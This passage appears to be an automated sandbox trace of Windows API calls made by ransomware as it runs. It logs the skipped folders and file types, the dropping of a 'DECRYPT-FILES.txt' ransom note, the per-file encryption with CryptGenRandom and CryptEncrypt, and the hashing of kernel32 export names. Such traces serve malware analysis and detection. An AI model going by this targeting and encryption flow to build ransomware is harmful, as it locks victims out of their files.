HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\Program Files") returned 0x0 [0083.061] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch=":\\Windows") returned 0x0 [0083.061] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\Games\\") returned 0x0 [0083.061] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\Tor Browser\\") returned 0x0 [0083.061] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\ProgramData\\") returned 0x0 [0083.061] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0083.061] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0083.061] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0083.061] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\All Users") returned 0x0 [0083.061] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\IETldCache\\") returned 0x0 [0083.061] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\Local Settings\\") returned 0x0 [0083.061] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\AppData\\Local") returned 0x0 [0083.061] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="AhnLab") returned 0x0 [0083.061] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0083.061] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned 65 [0083.061] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0083.061] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\\\jkbimi8.tmp") returned 77 [0083.062] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\h1mimyxalwng6ys6\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0083.062] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned 65 [0083.062] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0083.062] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\\\DECRYPT-FILES.txt") returned 83 [0083.062] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\h1mimyxalwng6ys6\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0083.062] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e434, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e434*=0x23fc, lpOverlapped=0x0) returned 1 [0083.063] CloseHandle (hObject=0x444) returned 1 [0083.063] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned 65 [0083.063] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\*" [0083.063] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\*", lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb2bef0b0, ftCreationTime.dwHighDateTime=0x1d4ced9, ftLastAccessTime.dwLowDateTime=0xadb3e2e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadb3e2e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0083.064] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.064] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb2bef0b0, ftCreationTime.dwHighDateTime=0x1d4ced9, ftLastAccessTime.dwLowDateTime=0xadb3e2e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadb3e2e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.064] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.064] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.064] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadb3e2e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xadb3e2e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadb3e2e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0083.064] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0083.064] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadb3e2e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xadb3e2e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadb3e2e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0083.064] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0083.064] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0083.064] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0083.064] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0083.064] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0083.064] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0083.064] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0083.064] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0083.064] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0083.064] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0083.064] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0083.064] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0083.064] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0083.064] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0083.064] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0083.064] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned 65 [0083.064] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0083.064] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\" [0083.064] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\jkbimi8.tmp" [0083.064] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.065] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\h1mimyxalwng6ys6\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0083.065] CloseHandle (hObject=0x0) returned 0 [0083.065] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.065] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fffb8c0, ftCreationTime.dwHighDateTime=0x1d4d2c7, ftLastAccessTime.dwLowDateTime=0xf5fe1930, ftLastAccessTime.dwHighDateTime=0x1d4c73d, ftLastWriteTime.dwLowDateTime=0xf5fe1930, ftLastWriteTime.dwHighDateTime=0x1d4c73d, nFileSizeHigh=0x0, nFileSizeLow=0xe734, dwReserved0=0x0, dwReserved1=0x0, cFileName="L8u5GZutaYG7tB7HCgdf.flv", cAlternateFileName="L8U5GZ~1.FLV")) returned 1 [0083.065] lstrcmpiW (lpString1="L8u5GZutaYG7tB7HCgdf.flv", lpString2="DECRYPT-FILES.txt") returned 1 [0083.065] lstrcmpiW (lpString1="L8u5GZutaYG7tB7HCgdf.flv", lpString2="autorun.inf") returned 1 [0083.065] lstrcmpiW (lpString1="L8u5GZutaYG7tB7HCgdf.flv", lpString2="boot.ini") returned 1 [0083.065] lstrcmpiW (lpString1="L8u5GZutaYG7tB7HCgdf.flv", lpString2="desktop.ini") returned 1 [0083.065] lstrcmpiW (lpString1="L8u5GZutaYG7tB7HCgdf.flv", lpString2="ntuser.dat") returned -1 [0083.065] lstrcmpiW (lpString1="L8u5GZutaYG7tB7HCgdf.flv", lpString2="iconcache.db") returned 1 [0083.065] lstrcmpiW (lpString1="L8u5GZutaYG7tB7HCgdf.flv", lpString2="bootsect.bak") returned 1 [0083.065] lstrcmpiW (lpString1="L8u5GZutaYG7tB7HCgdf.flv", lpString2="ntuser.dat.log") returned -1 [0083.065] lstrcmpiW (lpString1="L8u5GZutaYG7tB7HCgdf.flv", lpString2="thumbs.db") returned -1 [0083.065] lstrcmpiW (lpString1="L8u5GZutaYG7tB7HCgdf.flv", lpString2="Bootfont.bin") returned 1 [0083.065] lstrlenW (lpString="L8u5GZutaYG7tB7HCgdf.flv") returned 24 [0083.065] lstrcmpiW (lpString1="flv", lpString2="lnk") returned -1 [0083.065] lstrcmpiW (lpString1="flv", lpString2="exe") returned 1 [0083.065] lstrcmpiW (lpString1="flv", lpString2="sys") returned -1 [0083.065] lstrcmpiW (lpString1="flv", lpString2="dll") returned 1 [0083.065] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned 65 [0083.065] lstrlenW (lpString="L8u5GZutaYG7tB7HCgdf.flv") returned 24 [0083.065] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\" [0083.065] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpString2="L8u5GZutaYG7tB7HCgdf.flv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\L8u5GZutaYG7tB7HCgdf.flv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\L8u5GZutaYG7tB7HCgdf.flv" [0083.065] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.066] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\L8u5GZutaYG7tB7HCgdf.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\h1mimyxalwng6ys6\\l8u5gzutayg7tb7hcgdf.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0083.066] GetFileSizeEx (in: hFile=0x448, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=59188) returned 1 [0083.066] CreateFileMappingW (hFile=0x448, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x44c [0083.066] MapViewOfFile (hFileMappingObject=0x44c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0083.066] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.067] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.067] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.067] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0083.067] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0083.068] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.069] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0083.069] CloseHandle (hObject=0x44c) returned 1 [0083.069] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.070] WriteFile (in: hFile=0x448, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0083.070] CloseHandle (hObject=0x0) returned 0 [0083.070] CloseHandle (hObject=0x448) returned 1 [0083.071] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.071] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.072] GetTickCount () returned 0x114d3d3 [0083.072] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.072] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.072] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.072] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.072] lstrlenA (lpString="kernel32.dll") returned 12 [0083.072] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.072] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.073] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.073] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.073] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.073] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.073] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.073] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.073] lstrlenA (lpString="ADDATOMA") returned 8 [0083.073] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.073] lstrlenA (lpString="ADDATOMW") returned 8 [0083.073] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.073] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.073] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.073] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.073] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.073] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.073] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.073] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.073] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.073] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.073] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.073] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.073] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.073] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.073] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.073] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.073] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.073] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.073] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.073] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.073] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.073] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.073] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.073] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.073] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.073] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.073] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.074] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.074] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.074] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.074] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.074] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.074] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.074] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.074] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.074] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.074] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.074] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.074] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.074] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.074] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.074] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.074] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.074] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.074] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.074] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.074] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.074] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.074] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.074] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.074] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.074] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.074] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.074] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.074] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.074] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.074] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.074] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.074] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.074] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.074] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.074] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.074] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.074] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.075] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.075] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.075] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.075] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.075] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.075] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.075] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") 